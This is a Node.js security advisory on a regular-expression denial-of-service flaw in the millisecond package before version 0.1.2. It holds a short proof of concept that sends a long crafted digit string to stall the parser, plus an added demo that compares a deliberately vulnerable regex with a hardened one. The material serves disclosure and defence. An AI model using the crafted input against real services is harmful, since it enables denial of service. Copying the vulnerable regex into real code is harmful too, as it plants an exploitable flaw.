Regular Expression Denial of Service

2015-11-20T18:52:47
ID NODEJS:59
Type nodejs
Reporter Luigi Pinca
Modified 2018-05-08T14:27:02

Description

Overview

Versions of the millisecond package prior to 0.1.2 are affected by a regular expression denial of service (ReDoS) vulnerability. The regular expression used to parse time strings such as "5 minutes" backtracks excessively when it is given an extremely long input string, so a single crafted argument can keep the process busy for a long time.

Proof of concept

```
var ms = require('millisecond');

// Build a string consisting of `len` copies of `chr`.
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i < len; i++) {
    result = result + chr;
  }
  return result;
};

// The length of the digit run is taken from the command line,
// e.g. `node poc.js 50000`. The trailing "minutea" is almost, but
// not quite, a valid unit, so the match fails only after the whole
// digit run has been consumed and the engine backtracks through it.
ms(genstr(parseInt(process.argv[2], 10), "5") + " minutea");
```
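The following is an added example, not code from the millisecond package or from the fix referenced below. It shows the class of pattern the proof of concept exercises: a toy ms-style duration parser whose number group can be split between two `\d+` quantifiers in many ways, beside a version whose number group has exactly one parse and which additionally refuses inputs longer than an assumed limit (MAX_LEN is an illustrative choice, not a value from the package). Both regexes are illustrative and are not claimed to be the package's own.

```javascript
// Added example: a toy duration parser in the style of ms/millisecond.
// This is NOT the millisecond package's code; the regexes are illustrative.
const UNITS = { ms: 1, s: 1000, m: 60000, h: 3600000, d: 86400000 };

// Vulnerable shape: `(?:\d+)?\.?\d+` can split a run of n digits between the
// two \d+ in O(n) ways, and each split is retried when the rest of the pattern
// fails, so a long digit run followed by an almost-valid unit costs O(n^2).
const VULNERABLE_RE =
  /^((?:\d+)?\.?\d+) *(ms|seconds?|secs?|s|minutes?|mins?|m|hours?|hrs?|h|days?|d)?$/i;

// Hardened shape: the number has exactly one parse (`\d+` optionally followed
// by `.\d+`, or a bare `.\d+`), so a failure further right is found in O(n).
const SAFE_RE =
  /^(\d+(?:\.\d+)?|\.\d+) *(ms|seconds?|secs?|s|minutes?|mins?|m|hours?|hrs?|h|days?|d)?$/i;

// Defence in depth: no legitimate duration string is this long (assumed limit).
const MAX_LEN = 100;

// Map a matched unit (or none, meaning milliseconds) to a multiplier.
function unitToMs(unit) {
  const u = (unit || 'ms').toLowerCase();
  if (u === 'ms') return UNITS.ms;
  if (u.startsWith('s')) return UNITS.s; // s, sec, secs, second, seconds
  if (u.startsWith('m')) return UNITS.m; // m, min, mins, minute, minutes
  if (u.startsWith('h')) return UNITS.h; // h, hr, hrs, hour, hours
  if (u.startsWith('d')) return UNITS.d; // d, day, days
  return null;
}

// Run one of the regexes and convert the result to milliseconds, or null.
function parseWith(re, str) {
  const m = re.exec(str);
  if (!m) return null;
  return parseFloat(m[1]) * unitToMs(m[2]);
}

function vulnerableParse(str) {
  return parseWith(VULNERABLE_RE, str);
}

function safeParse(str) {
  if (typeof str !== 'string' || str.length > MAX_LEN) return null;
  return parseWith(SAFE_RE, str);
}

// Constructed input with the same shape as the advisory's proof of concept:
// n digits, then a unit that is almost valid so the match fails late.
function poisonInput(n) {
  return '5'.repeat(n) + ' minutea';
}

// Wall-clock time, in milliseconds, for one parse call.
function timeParse(fn, str) {
  const start = process.hrtime.bigint();
  fn(str);
  return Number(process.hrtime.bigint() - start) / 1e6;
}

if (typeof require !== 'undefined' && require.main === module) {
  // Doubling n roughly quadruples the vulnerable time and barely moves the safe one.
  for (const n of [1000, 2000, 4000]) {
    const input = poisonInput(n);
    console.log(
      `n=${n}: vulnerable ${timeParse(vulnerableParse, input).toFixed(1)} ms, ` +
      `safe ${timeParse(safeParse, input).toFixed(1)} ms`
    );
  }
}
```

Run it with `node redos-demo.js` (file name assumed). The length cap is what stops a caller from choosing n at all; the unambiguous regex is what keeps the cost linear for inputs that do pass the cap, so a parser exposed to untrusted input wants both.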

Recommendation

Update to version 0.1.2 or later.

References

PR #4